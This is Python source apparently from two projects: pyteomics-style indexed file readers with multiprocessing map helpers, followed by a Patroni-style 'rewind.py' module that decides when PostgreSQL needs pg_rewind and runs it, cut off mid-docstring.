        container[self._schema_version_tag_key] = self.schema_version
        json.dump(container, fp)

    @classmethod
    def load(cls, fp):
        """Load an index from the JSON file object *fp*, honoring the stored
        schema version."""
        container = json.load(fp, object_hook=OrderedDict)
        version_tag = container.get(cls._schema_version_tag_key)
        if version_tag is None:
            # The legacy case, no special processing yet
            # NOTE(review): the stored 'index' data is discarded here and an
            # empty instance is returned - confirm this is intentional.
            inst = cls()
            inst.schema_version = None
            return inst
        version_tag = tuple(version_tag)
        index = container.get("index")
        if version_tag < cls.schema_version:
            # schema upgrade case, no special processing yet
            inst = cls(index)
            inst.schema_version = version_tag
            return inst
        # no need to upgrade
        return cls(index)
class OffsetIndex(OrderedDict, WritableIndex):
    '''An augmented OrderedDict that formally wraps getting items by index
    '''
    def __init__(self, *args, **kwargs):
        super(OffsetIndex, self).__init__(*args, **kwargs)
        # lazily built tuple snapshot of items(); see index_sequence
        self._index_sequence = None

    def _invalidate(self):
        # drop the cached items() snapshot after a mutation
        self._index_sequence = None

    @property
    def index_sequence(self):
        """Keeps a cached copy of the :meth:`items` sequence
        stored as a :class:`tuple` to avoid repeatedly copying
        the sequence over many method calls.
        Returns
        -------
        :class:`tuple`
        """
        if self._index_sequence is None:
            self._index_sequence = tuple(self.items())
        return self._index_sequence

    def __setitem__(self, key, value):
        self._invalidate()
        return super(OffsetIndex, self).__setitem__(key, value)

    def pop(self, *args, **kwargs):
        # NOTE(review): only __setitem__ and pop invalidate the cache;
        # __delitem__/update/clear would leave index_sequence stale -
        # confirm callers never mutate through those paths.
        self._invalidate()
        return super(OffsetIndex, self).pop(*args, **kwargs)

    def find(self, key, *args, **kwargs):
        # extra arguments are accepted for interface compatibility and ignored
        return self[key]

    def from_index(self, index, include_value=False):
        '''Get an entry by its integer index in the ordered sequence
        of this mapping.
        Parameters
        ----------
        index: int
            The index to retrieve.
        include_value: bool
            Whether to return both the key and the value or just the key.
            Defaults to :const:`False`.
        Returns
        -------
        object:
            If ``include_value`` is :const:`True`, a tuple of (key, value) at ``index``
            else just the key at ``index``.
        '''
        items = self.index_sequence
        if include_value:
            return items[index]
        else:
            return items[index][0]

    def from_slice(self, spec, include_value=False):
        '''Get a slice along index in the ordered sequence
        of this mapping.
        Parameters
        ----------
        spec: slice
            The slice over the range of indices to retrieve
        include_value: bool
            Whether to return both the key and the value or just the key.
            Defaults to :const:`False`
        Returns
        -------
        list:
            If ``include_value`` is :const:`True`, a tuple of (key, value) at ``index``
            else just the key at ``index`` for each ``index`` in ``spec``
        '''
        items = self.index_sequence
        return [(k, v) if include_value else k for k, v in items[spec]]

    def between(self, start, stop, include_value=False):
        """Return the keys (or items, with ``include_value``) between the keys
        *start* and *stop*, inclusive.  Either bound may be None, meaning the
        corresponding end of the index; reversed bounds are swapped."""
        keys = list(self)
        if start is not None:
            try:
                start_index = keys.index(start)
            except ValueError:
                raise KeyError(start)
        else:
            start_index = 0
        if stop is not None:
            try:
                stop_index = keys.index(stop)
            except ValueError:
                raise KeyError(stop)
        else:
            stop_index = len(keys) - 1
        if start is None or stop is None:
            pass  # won't switch indices
        else:
            start_index, stop_index = min(start_index, stop_index), max(start_index, stop_index)
        if include_value:
            return [(k, self[k]) for k in keys[start_index:stop_index + 1]]
        return keys[start_index:stop_index + 1]

    def __repr__(self):
        template = "{self.__class__.__name__}({items})"
        return template.format(self=self, items=list(self.items()))

    def _integrity_check(self):
        # True when the stored offsets are already in ascending order
        indices = list(self.values())
        sorted_indices = sorted(self.values())
        return indices == sorted_indices

    def sort(self):
        """Reorder entries in place by offset value; returns self."""
        sorted_pairs = sorted(self.items(), key=lambda x: x[1])
        self.clear()
        self._invalidate()
        for key, value in sorted_pairs:
            self[key] = value
        return self
class IndexSavingTextReader(IndexSavingMixin, IndexedTextReader):
    """Indexed text reader whose byte-offset index can be saved to and
    loaded from a sidecar JSON file."""
    _index_class = OffsetIndex
class HierarchicalOffsetIndex(WritableIndex):
    """Two-level index: maps an element type to an inner :class:`OffsetIndex`
    of record IDs to byte ranges."""
    _inner_type = OffsetIndex

    def __init__(self, base=None):
        # missing element types get an empty inner index on first access
        self.mapping = defaultdict(self._inner_type)
        for key, value in (base or {}).items():
            self.mapping[key] = self._inner_type(value)

    def _integrity_check(self):
        # True only if every inner index has its offsets in sorted order
        for key, value in self.items():
            if not value._integrity_check():
                return False
        return True

    def sort(self):
        """Sort every inner index in place; returns self."""
        for key, value in self.items():
            value.sort()
        return self

    def __getitem__(self, key):
        return self.mapping[key]

    def __setitem__(self, key, value):
        self.mapping[key] = value

    def __iter__(self):
        return iter(self.mapping)

    def __len__(self):
        # total number of records across all element types
        return sum(len(group) for key, group in self.items())

    def __contains__(self, key):
        return key in self.mapping

    def find(self, key, element_type=None):
        """Look up *key* in the index for *element_type*; when the type is
        not given, try every type and raise KeyError if none matches."""
        if element_type is None:
            for element_type in self.keys():
                try:
                    return self.find(key, element_type)
                except KeyError:
                    continue
            raise KeyError(key)
        else:
            return self[element_type][key]

    def find_no_type(self, key):
        """Try to find `key` in each of the lower-level indexes, returning both
        value and the element type that match the key."""
        for element_type in self.keys():
            try:
                return self.find(key, element_type), element_type
            except KeyError:
                continue
        raise KeyError(key)

    def update(self, *args, **kwargs):
        # NOTE(review): values added here are not converted to _inner_type -
        # confirm callers always pass OffsetIndex instances
        self.mapping.update(*args, **kwargs)

    def pop(self, key, default=None):
        return self.mapping.pop(key, default)

    def keys(self):
        return self.mapping.keys()

    def values(self):
        return self.mapping.values()

    def items(self):
        return self.mapping.items()

    def _serializable_container(self):
        # serialize as {'keys': [...], 'index': {type: [(id, range), ...]}}
        encoded_index = {}
        container = {
            'keys': list(self.keys())
        }
        for key, offset in self.items():
            encoded_index[key] = list(offset.items())
        container['index'] = encoded_index
        return container
def _make_chain(reader, readername, full_output=False):
    """Build a ``dispatch`` function that chains *reader* over several files.

    With ``full_output`` the per-file results are read eagerly and
    concatenated into a single table; otherwise a lazy chained iterator
    (usable as a context manager) is returned.  *readername* is used only
    for the generated docstrings.
    """
    def concat_results(*args, **kwargs):
        # read every file fully, then concatenate the resulting tables
        results = [reader(arg, **kwargs) for arg in args]
        # Bug fix: the DataFrame check previously inspected `args` (the file
        # specs), so the pandas branch could never trigger; it must inspect
        # the parsed `results` (cf. TableJoiner.concatenate below).
        if pd is not None and all(isinstance(a, pd.DataFrame) for a in results):
            return pd.concat(results)
        return np.concatenate(results)

    def _iter(files, kwargs):
        # lazily yield items from each file in turn, closing each reader
        for f in files:
            with reader(f, **kwargs) as r:
                for item in r:
                    yield item

    def chain(*files, **kwargs):
        return _iter(files, kwargs)

    def from_iterable(files, **kwargs):
        return _iter(files, kwargs)

    @contextmanager
    def _chain(*files, **kwargs):
        yield chain(*files, **kwargs)

    @contextmanager
    def _from_iterable(files, **kwargs):
        yield from_iterable(files, **kwargs)

    def dispatch(*args, **kwargs):
        return dispatch_from_iterable(args, **kwargs)

    def dispatch_from_iterable(args, **kwargs):
        # per-call 'full_output' overrides the factory default
        if kwargs.get('full_output', full_output):
            return concat_results(*args, **kwargs)
        return _chain(*args, **kwargs)

    dispatch.__doc__ = """Chain :py:func:`{0}` for several files.
    Positional arguments should be file names or file objects.
    Keyword arguments are passed to the :py:func:`{0}` function.
    """.format(readername)
    dispatch_from_iterable.__doc__ = """Chain :py:func:`{0}` for several files.
    Keyword arguments are passed to the :py:func:`{0}` function.
    Parameters
    ----------
    files : iterable
        Iterable of file names or file objects.
    """.format(readername)
    dispatch.from_iterable = dispatch_from_iterable
    return dispatch
def _check_use_index(source, use_index, default):
    """Reconcile the user-supplied ``use_index`` flag with what *source*
    supports, warning about conflicts and returning the effective value.

    File names short-circuit to the user's choice (or *default*); file-like
    objects are checked for seekability and binary mode.
    """
    try:
        if use_index is not None:
            use_index = bool(use_index)
        # if a file name is given, do not override anything; short-circuit
        if isinstance(source, basestring):
            return use_index if use_index is not None else default
        # collect information on source
        if hasattr(source, 'seekable'):
            seekable = source.seekable()
        else:
            seekable = None
        if hasattr(source, 'mode'):
            binary = 'b' in source.mode
        else:
            binary = None
        # now check for conflicts
        if seekable is False:
            # indexing requires random access; binary mode makes it mandatory
            if binary:
                raise PyteomicsError('Cannot work with non-seekable file in binary mode: {}.'.format(source))
            if use_index:
                warnings.warn('Cannot use indexing as {} is not seekable. Setting `use_index` to False.'.format(source))
                use_index = False
        elif binary is not None:
            # binary streams are indexed, text streams are not; the file mode wins
            if use_index is not None and binary != use_index:
                warnings.warn('use_index is {}, but the file mode is {}. '
                              'Setting `use_index` to {}'.format(use_index, source.mode, binary))
            use_index = binary
        else:
            warnings.warn('Could not check mode on {}. Specify `use_index` explicitly to avoid errors.'.format(source))
        if use_index is not None:
            return use_index
        return default
    except PyteomicsError:
        raise
    except Exception as e:
        # inspection failed entirely; fall back to the caller's choice/default
        warnings.warn('Could not check mode on {}. Reason: {!r}. Specify `use_index` explicitly to avoid errors.'.format(source, e))
        if use_index is not None:
            return use_index
        return default
class FileReadingProcess(mp.Process):
    """Process that does a share of distributed work on entries read from file.
    Reconstructs a reader object, parses an entries from given indexes,
    optionally does additional processing, sends results back.
    The reader class must support the :py:meth:`__getitem__` dict-like lookup.
    """
    def __init__(self, reader_spec, target_spec, qin, qout, args_spec, kwargs_spec):
        # *_spec arguments are serializer (pickle/dill) payloads; they are
        # deserialized inside run(), i.e. in the child process
        super(FileReadingProcess, self).__init__(name='pyteomics-map-worker')
        self.reader_spec = reader_spec
        self.target_spec = target_spec
        self.args_spec = args_spec
        self.kwargs_spec = kwargs_spec
        self._qin = qin
        self._qout = qout
        # self._in_flag = in_flag
        self._done_flag = mp.Event()
        # daemonize so stray workers die with the parent process
        self.daemon = True

    def run(self):
        reader = serializer.loads(self.reader_spec)
        target = serializer.loads(self.target_spec)
        args = serializer.loads(self.args_spec)
        kwargs = serializer.loads(self.kwargs_spec)
        # consume keys until the None sentinel placed by the feeder thread
        for key in iter(self._qin.get, None):
            item = reader[key]
            if target is not None:
                result = target(item, *args, **kwargs)
            else:
                result = item
            self._qout.put(result)
        self._done_flag.set()

    def is_done(self):
        # True once this worker has drained its input and set the flag
        return self._done_flag.is_set()
try:
    _NPROC = mp.cpu_count()
except NotImplementedError:
    # cpu_count() can be unavailable on some platforms; use a sane default
    _NPROC = 4
_QUEUE_TIMEOUT = 4       # seconds to wait on the result queue before re-checking workers
_QUEUE_SIZE = int(1e7)   # default max number of items in the IPC queues
class TaskMappingMixin(NoOpBaseReader):
    def __init__(self, *args, **kwargs):
        '''
        Instantiate a :py:class:`TaskMappingMixin` object, set default parameters for IPC.
        Parameters
        ----------
        timeout : float, keyword only, optional
            The number of seconds to block, waiting for a result before checking to see if
            all workers are done.
        queue_size : int, keyword only, optional
            The length of IPC queue used.
        processes : int, keyword only, optional
            Number of worker processes to spawn when :py:meth:`map` is called. This can also be
            specified in the :py:meth:`map` call.
        '''
        self._queue_size = kwargs.pop('queue_size', _QUEUE_SIZE)
        self._queue_timeout = kwargs.pop('timeout', _QUEUE_TIMEOUT)
        self._nproc = kwargs.pop('processes', _NPROC)
        super(TaskMappingMixin, self).__init__(*args, **kwargs)

    def _get_reader_for_worker_spec(self):
        # the object serialized and shipped to worker processes
        return self

    def _build_worker_spec(self, target, args, kwargs):
        """Serialize the reader, target and call arguments for the workers,
        raising a helpful error when pickling fails."""
        serialized = []
        for obj, objname in [(self._get_reader_for_worker_spec(), 'reader'), (target, 'target'), (args, 'args'),
                             (kwargs, 'kwargs')]:
            try:
                serialized.append(serializer.dumps(obj))
            except serializer.PicklingError:
                msg = 'Could not serialize {0} {1} with {2.__name__}.'.format(objname, obj, serializer)
                if serializer is not dill:
                    msg += ' Try installing `dill`.'
                raise PyteomicsError(msg)
        return serialized

    def _spawn_workers(self, specifications, in_queue, out_queue, processes):
        """Create (but do not start) *processes* worker processes."""
        reader_spec, target_spec, args_spec, kwargs_spec = specifications
        workers = []
        for _ in range(processes):
            worker = FileReadingProcess(
                reader_spec, target_spec, in_queue, out_queue, args_spec, kwargs_spec)
            workers.append(worker)
        return workers

    def _spawn_feeder_thread(self, in_queue, iterator, processes):
        """Start a daemon thread that feeds work keys into *in_queue* and
        terminates every worker with a None sentinel."""
        def feeder():
            for key in iterator:
                in_queue.put(key)
            # one sentinel per worker so each one shuts down
            for _ in range(processes):
                in_queue.put(None)

        feeder_thread = threading.Thread(target=feeder)
        feeder_thread.daemon = True
        feeder_thread.start()
        return feeder_thread

    def map(self, target=None, processes=-1, args=None, kwargs=None, **_kwargs):
        """Execute the ``target`` function over entries of this object across up to ``processes``
        processes.
        Results will be returned out of order.
        Parameters
        ----------
        target : :class:`Callable`, optional
            The function to execute over each entry. It will be given a single object yielded by
            the wrapped iterator as well as all of the values in ``args`` and ``kwargs``
        processes : int, optional
            The number of worker processes to use. If 0 or negative,
            defaults to the number of available CPUs.
            This parameter can also be set at reader creation.
        args : :class:`Sequence`, optional
            Additional positional arguments to be passed to the target function
        kwargs : :class:`Mapping`, optional
            Additional keyword arguments to be passed to the target function
        **_kwargs
            Additional keyword arguments to be passed to the target function
        Yields
        ------
        object
            The work item returned by the target function.
        """
        if self._offset_index is None:
            raise PyteomicsError('The reader needs an index for map() calls. Create the reader with `use_index=True`.')
        if processes < 1:
            processes = self._nproc
        iterator = self._task_map_iterator()
        if args is None:
            args = tuple()
        else:
            args = tuple(args)
        if kwargs is None:
            kwargs = dict()
        else:
            kwargs = dict(kwargs)
        kwargs.update(_kwargs)
        serialized = self._build_worker_spec(target, args, kwargs)
        in_queue = mp.Queue(self._queue_size)
        out_queue = mp.Queue(self._queue_size)
        workers = self._spawn_workers(serialized, in_queue, out_queue, processes)
        feeder_thread = self._spawn_feeder_thread(in_queue, iterator, processes)
        for worker in workers:
            worker.start()

        def iterate():
            # drain the output queue until every worker reports done;
            # the timeout keeps us from blocking forever on idle workers
            while True:
                try:
                    result = out_queue.get(True, self._queue_timeout)
                    yield result
                except Empty:
                    if all(w.is_done() for w in workers):
                        break
                    else:
                        continue
            feeder_thread.join()
            for worker in workers:
                worker.join()
        return iterate()

    def _task_map_iterator(self):
        """Returns the :class:`Iteratable` to use when dealing work items onto the input IPC
        queue used by :meth:`map`
        Returns
        -------
        :class:`Iteratable`
        """
        return iter(self._offset_index.keys())
class ChainBase(object):
    """Chain :meth:`sequence_maker` for several sources into a
    single iterable. Positional arguments should be sources like
    file names or file objects. Keyword arguments are passed to
    the :meth:`sequence_maker` function.
    Attributes
    ----------
    sources : :class:`Iterable`
        Sources for creating new sequences from, such as paths or
        file-like objects
    kwargs : :class:`Mapping`
        Additional arguments used to instantiate each sequence
    """
    def __init__(self, *sources, **kwargs):
        self.sources = sources
        self.kwargs = kwargs
        self._iterator = None

    @classmethod
    def from_iterable(cls, sources, **kwargs):
        # alternate constructor taking an iterable instead of *args
        return cls(*sources, **kwargs)

    @classmethod
    def _make_chain(cls, sequence_maker):
        """Create a ChainBase subclass bound to *sequence_maker* (a reader
        class or a plain function)."""
        if isinstance(sequence_maker, type):
            tp = type('%sChain' % sequence_maker.__class__.__name__, (cls,), {
                'sequence_maker': sequence_maker
            })
        else:
            # wrap plain functions so they are not bound as methods
            tp = type('FunctionChain', (cls,), {
                'sequence_maker': staticmethod(sequence_maker)
            })
        return tp

    def sequence_maker(self, file):
        # overridden via _make_chain or in subclasses
        raise NotImplementedError()

    def _create_sequence(self, file):
        return self.sequence_maker(file, **self.kwargs)

    def _iterate_over_series(self):
        # iterate each source's reader to exhaustion, closing it afterwards
        for f in self.sources:
            with self._create_sequence(f) as r:
                for item in r:
                    yield item

    def __enter__(self):
        self._iterator = iter(self._iterate_over_series())
        return self

    def __exit__(self, *args, **kwargs):
        self._iterator = None

    def __iter__(self):
        return self

    def __next__(self):
        # lazily start iteration when used outside a with-block
        if self._iterator is None:
            self._iterator = self._iterate_over_series()
        return next(self._iterator)

    def next(self):
        # Python 2 compatibility
        return self.__next__()

    def map(self, target=None, processes=-1, queue_timeout=_QUEUE_TIMEOUT, args=None, kwargs=None, **_kwargs):
        """Execute the ``target`` function over entries of this object across up to ``processes``
        processes.
        Results will be returned out of order.
        Parameters
        ----------
        target : :class:`Callable`, optional
            The function to execute over each entry. It will be given a single object yielded by
            the wrapped iterator as well as all of the values in ``args`` and ``kwargs``
        processes : int, optional
            The number of worker processes to use. If negative, the number of processes
            will match the number of available CPUs.
        queue_timeout : float, optional
            The number of seconds to block, waiting for a result before checking to see if
            all workers are done.
        args : :class:`Sequence`, optional
            Additional positional arguments to be passed to the target function
        kwargs : :class:`Mapping`, optional
            Additional keyword arguments to be passed to the target function
        **_kwargs
            Additional keyword arguments to be passed to the target function
        Yields
        ------
        object
            The work item returned by the target function.
        """
        # NOTE(review): queue_timeout is passed positionally here, but
        # TaskMappingMixin.map has no queue_timeout parameter (its signature
        # is (target, processes, args, kwargs, **_kwargs)) - verify that the
        # readers produced by _create_sequence accept this argument order.
        for f in self.sources:
            with self._create_sequence(f) as r:
                for result in r.map(target, processes, queue_timeout, args, kwargs, **_kwargs):
                    yield result
class TableJoiner(ChainBase):
    """Chain variant that concatenates all per-file results into one table."""

    def concatenate(self, results):
        """Merge per-file results into a single DataFrame or array."""
        # Prefer pandas when it is available and every chunk is a DataFrame.
        if pd is not None and all(isinstance(chunk, pd.DataFrame) for chunk in results):
            return pd.concat(results)
        if isinstance(results[0], np.ndarray):
            return np.concatenate(results)
        # Fall back to flattening arbitrary iterables row by row.
        return np.array([row for chunk in results for row in chunk])

    def _iterate_over_series(self):
        """Materialize a sequence per source and return their concatenation."""
        sequences = [self._create_sequence(source) for source in self.sources]
        return self.concatenate(sequences)
|
rewind.py | import logging
import os
import shlex
import six
import subprocess
from threading import Lock, Thread
from .connection import get_connection_cursor
from .misc import format_lsn, parse_history, parse_lsn
from ..async_executor import CriticalTask
from ..dcs import Leader
logger = logging.getLogger(__name__)

# Poor-man's enum describing the rewind state machine; the numeric ordering
# matters (see Rewind.executed, which compares with ``>``).
REWIND_STATUS = type('Enum', (), {'INITIAL': 0, 'CHECKPOINT': 1, 'CHECK': 2, 'NEED': 3,
                                  'NOT_NEED': 4, 'SUCCESS': 5, 'FAILED': 6})
class Rewind(object):
    """Decides whether pg_rewind is needed/possible for this node and runs it.

    Progress is tracked in ``self._state`` using the module-level
    REWIND_STATUS pseudo-enum."""

    def __init__(self, postgresql):
        self._postgresql = postgresql
        self._checkpoint_task_lock = Lock()
        self.reset_state()

    @staticmethod
    def configuration_allows_rewind(data):
        # pg_rewind requires either wal_log_hints=on or data checksums enabled;
        # both facts are reported by pg_controldata.
        return data.get('wal_log_hints setting', 'off') == 'on' or data.get('Data page checksum version', '0') != '0'

    @property
    def can_rewind(self):
        """ check if pg_rewind executable is there and that pg_controldata indicates
        we have either wal_log_hints or checksums turned on
        """
        # low-hanging fruit: check if pg_rewind configuration is there
        if not self._postgresql.config.get('use_pg_rewind'):
            return False

        cmd = [self._postgresql.pgcommand('pg_rewind'), '--help']
        try:
            # Fix: the original passed ``open(os.devnull, 'w')`` inline and
            # never closed it, leaking a file descriptor on every call.
            with open(os.devnull, 'w') as devnull:
                ret = subprocess.call(cmd, stdout=devnull, stderr=subprocess.STDOUT)
            if ret != 0:  # pg_rewind is not there, close up the shop and go home
                return False
        except OSError:
            return False
        return self.configuration_allows_rewind(self._postgresql.controldata())

    @property
    def can_rewind_or_reinitialize_allowed(self):
        return self._postgresql.config.get('remove_data_directory_on_diverged_timelines') or self.can_rewind

    def trigger_check_diverged_lsn(self):
        # Switch into CHECK state unless a rewind was already found necessary.
        if self.can_rewind_or_reinitialize_allowed and self._state != REWIND_STATUS.NEED:
            self._state = REWIND_STATUS.CHECK

    @staticmethod
    def check_leader_is_not_in_recovery(conn_kwargs):
        """Return True when the leader answers ``pg_is_in_recovery() = false``.

        Returns None on query failure or when the leader is in recovery."""
        try:
            with get_connection_cursor(connect_timeout=3, options='-c statement_timeout=2000', **conn_kwargs) as cur:
                cur.execute('SELECT pg_catalog.pg_is_in_recovery()')
                if not cur.fetchone()[0]:
                    return True
                logger.info('Leader is still in_recovery and therefore can\'t be used for rewind')
        except Exception:
            return logger.exception('Exception when working with leader')

    def _get_checkpoint_end(self, timeline, lsn):
        """The checkpoint record size in WAL depends on postgres major version and platform (memory alignment).
        Hence, the only reliable way to figure out where it ends, read the record from file with the help of pg_waldump
        and parse the output. We are trying to read two records, and expect that it will fail to read the second one:
        `pg_waldump: fatal: error in WAL record at 0/182E220: invalid record length at 0/182E298: wanted 24, got 0`
        The error message contains information about LSN of the next record, which is exactly where checkpoint ends."""
        lsn8 = format_lsn(lsn, True)
        lsn = format_lsn(lsn)
        out, err = self._postgresql.waldump(timeline, lsn, 2)
        if out is not None and err is not None:
            out = out.decode('utf-8').rstrip().split('\n')
            err = err.decode('utf-8').rstrip().split('\n')
            # Expect exactly one record on stdout and the "invalid record
            # length" complaint on stderr pointing at the next record's LSN.
            pattern = 'error in WAL record at {0}: invalid record length at '.format(lsn)
            if len(out) == 1 and len(err) == 1 and ', lsn: {0}, prev '.format(lsn8) in out[0] and pattern in err[0]:
                i = err[0].find(pattern) + len(pattern)
                j = err[0].find(": wanted ", i)
                if j > -1:
                    try:
                        return parse_lsn(err[0][i:j])
                    except Exception as e:
                        logger.error('Failed to parse lsn %s: %r', err[0][i:j], e)
            logger.error('Failed to parse pg_%sdump output', self._postgresql.wal_name)
            logger.error(' stdout=%s', '\n'.join(out))
            logger.error(' stderr=%s', '\n'.join(err))
        return 0

    def _get_local_timeline_lsn_from_controldata(self):
        """Derive (in_recovery, timeline, lsn) from pg_controldata output."""
        in_recovery = timeline = lsn = None
        data = self._postgresql.controldata()
        try:
            if data.get('Database cluster state') == 'shut down in recovery':
                in_recovery = True
                lsn = data.get('Minimum recovery ending location')
                timeline = int(data.get("Min recovery ending loc's timeline"))
                if lsn == '0/0' or timeline == 0:  # it was a master when it crashed
                    data['Database cluster state'] = 'shut down'
            if data.get('Database cluster state') == 'shut down':
                in_recovery = False
                lsn = data.get('Latest checkpoint location')
                timeline = int(data.get("Latest checkpoint's TimeLineID"))
        except (TypeError, ValueError):
            logger.exception('Failed to get local timeline and lsn from pg_controldata output')

        if lsn is not None:
            try:
                lsn = parse_lsn(lsn)
            except (IndexError, ValueError) as e:
                logger.error('Exception when parsing lsn %s: %r', lsn, e)
                lsn = None

        return in_recovery, timeline, lsn

    def _get_local_timeline_lsn(self):
        if self._postgresql.is_running():  # if postgres is running - get timeline from replication connection
            in_recovery = True
            timeline = self._postgresql.received_timeline() or self._postgresql.get_replica_timeline()
            lsn = self._postgresql.replayed_location()
        else:  # otherwise analyze pg_controldata output
            in_recovery, timeline, lsn = self._get_local_timeline_lsn_from_controldata()

        log_lsn = format_lsn(lsn) if isinstance(lsn, six.integer_types) else lsn
        logger.info('Local timeline=%s lsn=%s', timeline, log_lsn)
        return in_recovery, timeline, lsn

    @staticmethod
    def _log_master_history(history, i):
        # Show a window around the matched entry (up to 3 lines before and 2
        # after), eliding the middle with '...' when the tail is not adjacent.
        start = max(0, i - 3)
        end = None if i + 4 >= len(history) else i + 2
        history_show = []

        def format_history_line(line):
            return '{0}\t{1}\t{2}'.format(line[0], format_lsn(line[1]), line[2])

        for line in history[start:end]:
            history_show.append(format_history_line(line))

        if line != history[-1]:
            history_show.append('...')
            history_show.append(format_history_line(history[-1]))

        logger.info('master: history=%s', '\n'.join(history_show))

    def _conn_kwargs(self, member, auth):
        """Build libpq connection kwargs for *member* with *auth* credentials."""
        ret = member.conn_kwargs(auth)
        if not ret.get('dbname'):
            ret['dbname'] = self._postgresql.database
        # Add target_session_attrs in case more than one hostname is specified
        # (libpq client-side failover) making sure we hit the primary
        if 'target_session_attrs' not in ret and self._postgresql.major_version >= 100000:
            ret['target_session_attrs'] = 'read-write'
        return ret

    def _check_timeline_and_lsn(self, leader):
        """Compare the local timeline/LSN against the leader and set the state
        to NEED or NOT_NEED accordingly."""
        in_recovery, local_timeline, local_lsn = self._get_local_timeline_lsn()
        if local_timeline is None or local_lsn is None:
            return

        if isinstance(leader, Leader) and leader.member.data.get('role') != 'master':
            return

        if not self.check_leader_is_not_in_recovery(
                self._conn_kwargs(leader, self._postgresql.config.replication)):
            return

        history = need_rewind = None
        try:
            with self._postgresql.get_replication_connection_cursor(**leader.conn_kwargs()) as cur:
                cur.execute('IDENTIFY_SYSTEM')
                master_timeline = cur.fetchone()[1]
                logger.info('master_timeline=%s', master_timeline)
                if local_timeline > master_timeline:  # Not always supported by pg_rewind
                    need_rewind = True
                elif local_timeline == master_timeline:
                    need_rewind = False
                elif master_timeline > 1:
                    cur.execute('TIMELINE_HISTORY {0}'.format(master_timeline))
                    history = cur.fetchone()[1]
                    if not isinstance(history, six.string_types):
                        history = bytes(history).decode('utf-8')
                    logger.debug('master: history=%s', history)
        except Exception:
            return logger.exception('Exception when working with master via replication connection')

        if history is not None:
            history = list(parse_history(history))
            for i, (parent_timeline, switchpoint, _) in enumerate(history):
                if parent_timeline == local_timeline:
                    # We don't need to rewind when:
                    # 1. for replica: replayed location is not ahead of switchpoint
                    # 2. for the former primary: end of checkpoint record is the same as switchpoint
                    if in_recovery:
                        need_rewind = local_lsn > switchpoint
                    elif local_lsn >= switchpoint:
                        need_rewind = True
                    else:
                        need_rewind = switchpoint != self._get_checkpoint_end(local_timeline, local_lsn)
                    # Fix: without this break the loop's ``else`` clause below
                    # would always run and override the value just computed.
                    break
                elif parent_timeline > local_timeline:
                    need_rewind = True
                    break
            else:
                need_rewind = True
            self._log_master_history(history, i)

        self._state = need_rewind and REWIND_STATUS.NEED or REWIND_STATUS.NOT_NEED

    def rewind_or_reinitialize_needed_and_possible(self, leader):
        if leader and leader.name != self._postgresql.name and leader.conn_url and self._state == REWIND_STATUS.CHECK:
            self._check_timeline_and_lsn(leader)
        return leader and leader.conn_url and self._state == REWIND_STATUS.NEED

    def __checkpoint(self, task, wakeup):
        # Runs in the background thread started by ensure_checkpoint_after_promote().
        try:
            result = self._postgresql.checkpoint()
        except Exception as e:
            result = 'Exception: ' + str(e)
        with task:
            task.complete(not bool(result))
            if task.result:
                wakeup()

    def ensure_checkpoint_after_promote(self, wakeup):
        """After promote issue a CHECKPOINT from a new thread and asynchronously check the result.
        In case if CHECKPOINT failed, just check that timeline in pg_control was updated."""
        if self._state == REWIND_STATUS.INITIAL and self._postgresql.is_leader():
            with self._checkpoint_task_lock:
                if self._checkpoint_task:
                    with self._checkpoint_task:
                        if self._checkpoint_task.result is not None:
                            self._state = REWIND_STATUS.CHECKPOINT
                            self._checkpoint_task = None
                elif self._postgresql.get_master_timeline() == self._postgresql.pg_control_timeline():
                    self._state = REWIND_STATUS.CHECKPOINT
                else:
                    self._checkpoint_task = CriticalTask()
                    Thread(target=self.__checkpoint, args=(self._checkpoint_task, wakeup)).start()

    def checkpoint_after_promote(self):
        return self._state == REWIND_STATUS.CHECKPOINT

    def _fetch_missing_wal(self, restore_command, wal_filename):
        """Expand %p/%f/%r/%% placeholders in *restore_command* and run it.

        Returns True when the command exited with 0."""
        cmd = ''
        length = len(restore_command)
        i = 0
        while i < length:
            if restore_command[i] == '%' and i + 1 < length:
                i += 1
                if restore_command[i] == 'p':
                    cmd += os.path.join(self._postgresql.wal_dir, wal_filename)
                elif restore_command[i] == 'f':
                    cmd += wal_filename
                elif restore_command[i] == 'r':
                    cmd += '000000010000000000000001'
                elif restore_command[i] == '%':
                    cmd += '%'
                else:
                    # Unknown escape: keep the '%' and re-process this character.
                    cmd += '%'
                    i -= 1
            else:
                cmd += restore_command[i]
            i += 1

        logger.info('Trying to fetch the missing wal: %s', cmd)
        return self._postgresql.cancellable.call(shlex.split(cmd)) == 0

    def _find_missing_wal(self, data):
        """Extract the name of a missing WAL file from pg_rewind output, if any."""
        # could not open file "$PGDATA/pg_wal/0000000A00006AA100000068": No such file or directory
        pattern = 'could not open file "'
        for line in data.decode('utf-8').split('\n'):
            b = line.find(pattern)
            if b > -1:
                b += len(pattern)
                e = line.find('": ', b)
                if e > -1 and '/' in line[b:e]:
                    waldir, wal_filename = line[b:e].rsplit('/', 1)
                    if waldir.endswith('/pg_' + self._postgresql.wal_name) and len(wal_filename) == 24:
                        return wal_filename

    def pg_rewind(self, r):
        """Run pg_rewind against the server described by *r*, retrying after
        fetching a missing WAL segment when that is possible (PG < 13).

        Returns True on success."""
        # prepare pg_rewind connection
        env = self._postgresql.config.write_pgpass(r)
        env.update(LANG='C', LC_ALL='C', PGOPTIONS='-c statement_timeout=0')
        dsn = self._postgresql.config.format_dsn(r, True)
        logger.info('running pg_rewind from %s', dsn)

        restore_command = self._postgresql.config.get('recovery_conf', {}).get('restore_command') \
            if self._postgresql.major_version < 120000 else self._postgresql.get_guc_value('restore_command')

        cmd = [self._postgresql.pgcommand('pg_rewind')]
        if self._postgresql.major_version >= 130000 and restore_command:
            # pg_rewind 13+ can fetch missing WALs itself.
            cmd.append('--restore-target-wal')
        cmd.extend(['-D', self._postgresql.data_dir, '--source-server', dsn])

        while True:
            results = {}
            ret = self._postgresql.cancellable.call(cmd, env=env, communicate=results)

            logger.info('pg_rewind exit code=%s', ret)
            if ret is None:
                return False

            logger.info(' stdout=%s', results['stdout'].decode('utf-8'))
            logger.info(' stderr=%s', results['stderr'].decode('utf-8'))

            if ret == 0:
                return True

            if not restore_command or self._postgresql.major_version >= 130000:
                return False

            missing_wal = self._find_missing_wal(results['stderr']) or self._find_missing_wal(results['stdout'])
            if not missing_wal:
                return False

            if not self._fetch_missing_wal(restore_command, missing_wal):
                logger.info('Failed to fetch WAL segment %s required for pg_rewind', missing_wal)
                return False

    def execute(self, leader):
        """Stop postgres if needed and try to rewind from *leader*.

        On unrecoverable failure optionally removes the data directory,
        depending on configuration. Always returns False (callers only rely on
